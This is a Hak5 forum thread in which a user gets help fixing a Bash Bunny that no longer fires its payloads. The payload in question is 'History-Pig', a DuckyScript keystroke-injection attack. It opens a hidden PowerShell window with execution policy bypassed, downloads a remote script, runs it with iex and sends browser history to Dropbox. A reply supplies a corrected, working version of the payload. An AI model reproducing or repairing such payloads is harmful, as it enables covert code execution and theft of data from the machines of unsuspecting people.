baud Posted December 31, 2023 Share Posted December 31, 2023 Hello all, I purchased a Bash Bunny a couple months ago and I just recently tried using it yesterday. It was working for the majority of the day and then suddenly the scripts just stopped firing on switch1 or switch2. I'm able to put it into arming mode just fine, and I know the scripts themselves work because they're directly from the github repo and they were working previously. When I plug in the Bash Bunny, the light turns green, then turns off and nothing happens. I've preformed a factory reset, the problem still persists. Please help. File structure with no SD Card: File structure with SD Card: Quote Link to comment Share on other sites More sharing options...
dark_pyrro Posted December 31, 2023 Share Posted December 31, 2023 16 minutes ago, baud said: then suddenly the scripts just stopped firing on switch1 or switch2 Is the "suddenly" moment linked to you starting to use a Micro SD card with the Bunny? Judging from the screenshots, it seems as if you have tried to "duplicate" the file system structure of the internal storage to the Micro SD card. That won't work though since you always have to execute payloads stored on the internal udisk, not from the Micro SD card. They will simply not run at all. Quote Link to comment Share on other sites More sharing options...
baud Posted December 31, 2023 Author Share Posted December 31, 2023 1 minute ago, dark_pyrro said: Is the "suddenly" moment linked to you starting to use a Micro SD card with the Bunny? Judging from the screenshots, it seems as if you have tried to "duplicate" the file system structure of the internal storage to the Micro SD card. That won't work though since you always have to execute payloads stored on the internal udisk, not from the Micro SD card. They will simply not run at all. Interesting, so you don't put anything on the SD card at all? Everything should be stored directly on the bunny? Quote Link to comment Share on other sites More sharing options...
dark_pyrro Posted December 31, 2023 Share Posted December 31, 2023 https://docs.hak5.org/bash-bunny/getting-started/considerations-for-mark-ii#storage Quote Link to comment Share on other sites More sharing options...
baud Posted December 31, 2023 Author Share Posted December 31, 2023 6 minutes ago, dark_pyrro said: https://docs.hak5.org/bash-bunny/getting-started/considerations-for-mark-ii#storage I see, however it doesn't work at all even without the SD card in it. The light just turns green, then goes off and nothing happens. It was launching the scripts previously, even with the duplicated file structure. Quote Link to comment Share on other sites More sharing options...
dark_pyrro Posted December 31, 2023 Share Posted December 31, 2023 What payloads are you using in each switch position? Quote Link to comment Share on other sites More sharing options...
baud Posted December 31, 2023 Author Share Posted December 31, 2023 Just now, dark_pyrro said: What payloads are you using in each switch position? Currently the only one I'm using is History-Pig. If I copy/paste the powershell string into run it executes as expected, the bash bunny just never sends any keystrokes. REM Â Â Title: History-Pig REM Â Â Author: atomiczsec REM Â Â Description: This payload is meant to exfiltrate browsers history to a dropbox REM Â Â Target: Windows 10, 11 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr 'https://redacted.site/pl.ps1'; iex $pl ENTER REM Â Â Remember to replace the link with your DropBox shared link for the intended file to download REM Â Â Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 Quote Link to comment Share on other sites More sharing options...
dark_pyrro Posted December 31, 2023 Share Posted December 31, 2023 Where's the ATTACKMODE? Quote Link to comment Share on other sites More sharing options...
baud Posted December 31, 2023 Author Share Posted December 31, 2023 12 minutes ago, dark_pyrro said: Where's the ATTACKMODE? I am not sure, I am very new to duckyscript. I got this directly from github and it was executing as is before which is odd to me if it's missing something. What do I need to add? ATTACKMODE something something? Quote Link to comment Share on other sites More sharing options...
baud Posted December 31, 2023 Author Share Posted December 31, 2023 3 minutes ago, baud said: I am not sure, I am very new to duckyscript. I got this directly from github and it was executing as is before which is odd to me if it's missing something. What do I need to add? ATTACKMODE something something? I see, it looks like I'd need to add ATTACKMODE HID, I'll give that a shot. Quote Link to comment Share on other sites More sharing options...
dark_pyrro Posted December 31, 2023 Share Posted December 31, 2023 It seems as if the author of the payload has forgotten to add that for some reason. Not sure why. You need to tell the Bunny what mode it should "act in". If you don't tell it to act as a keyboard (HID), it won't type anything. So... add ATTACKMODE HID to the top of the payload file To my knowledge, it's only the 2nd gen Ducky that defaults to ATTACKMODE HID if nothing is specified. Never heard/seen that it's valid for the Bunny. However, I guess you will have a bit of a challenge to get that running anyway since Dropbox has changed the way shared storage links are working and I don't think this payload has been adjusted to that fact. Quote Link to comment Share on other sites More sharing options...
baud Posted December 31, 2023 Author Share Posted December 31, 2023 5 minutes ago, dark_pyrro said: It seems as if the author of the payload has forgotten to add that for some reason. Not sure why. You need to tell the Bunny what mode it should "act in". If you don't tell it to act as a keyboard (HID), it won't type anything. So... add ATTACKMODE HID to the top of the payload file To my knowledge, it's only the 2nd gen Ducky that defaults to ATTACKMODE HID if nothing is specified. Never heard/seen that it's valid for the Bunny. However, I guess you will have a bit of a challenge to get that running anyway since Dropbox has changed the way shared storage links are working and I don't think this payload has been adjusted to that fact. Thanks, I added the following to the top, and it's at least changing to a red LED now but I still get no output. I suspect the issue lies with the script itself, I'll play around with it for a while. In regards to the dropbox piece, that all works fine. If I copy/paste the powershell string from the payload and manually run it in a run window, it downloads, executes and exfils and expected. Thanks again for your help, I'll report back if anything changes. LED R ATTACKMODE HID Quote Link to comment Share on other sites More sharing options...
Solution dark_pyrro Posted December 31, 2023 Solution Share Posted December 31, 2023 Yes, you need to QUACK things. The author is a competent user, so I'm not sure why it has been forgotten. Perhaps too quickly "converting" it from the USB Rubber Ducky to the Bunny. Quote Link to comment Share on other sites More sharing options...
dark_pyrro Posted December 31, 2023 Share Posted December 31, 2023 Something like this ATTACKMODE HID QUACK DELAY 3000 QUACK GUI r QUACK DELAY 500 QUACK STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr 'https://redacted.site/pl.ps1'; iex $pl QUACK ENTER Perhaps also wrap the powershell line in quote marks and escape the dollar char as well QUACK STRING "powershell -w h -NoP -NonI -ep Bypass \$pl = iwr 'https://redacted.site/pl.ps1'; iex \$pl" Â Quote Link to comment Share on other sites More sharing options...
baud Posted December 31, 2023 Author Share Posted December 31, 2023 6 minutes ago, dark_pyrro said: Yes, you need to QUACK things. The author is a competent user, so I'm not sure why it has been forgotten. Perhaps too quickly "converting" it from the USB Rubber Ducky to the Bunny. You are the man, thanks so much. This gives me a much better understanding overall on how to use it. Quote Link to comment Share on other sites More sharing options...
dark_pyrro Posted December 31, 2023 Share Posted December 31, 2023 There's always the official documentation. I'd suggest reading all of it. https://docs.hak5.org/bash-bunny/ Quote Link to comment Share on other sites More sharing options...
baud Posted December 31, 2023 Author Share Posted December 31, 2023 46 minutes ago, dark_pyrro said: There's always the official documentation. I'd suggest reading all of it. https://docs.hak5.org/bash-bunny/ Admittedly, yes I should "RTFM" however I figured I'd be safe with scripts from the official repo. Thanks again for all your help, if they aren't paying you they should be. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.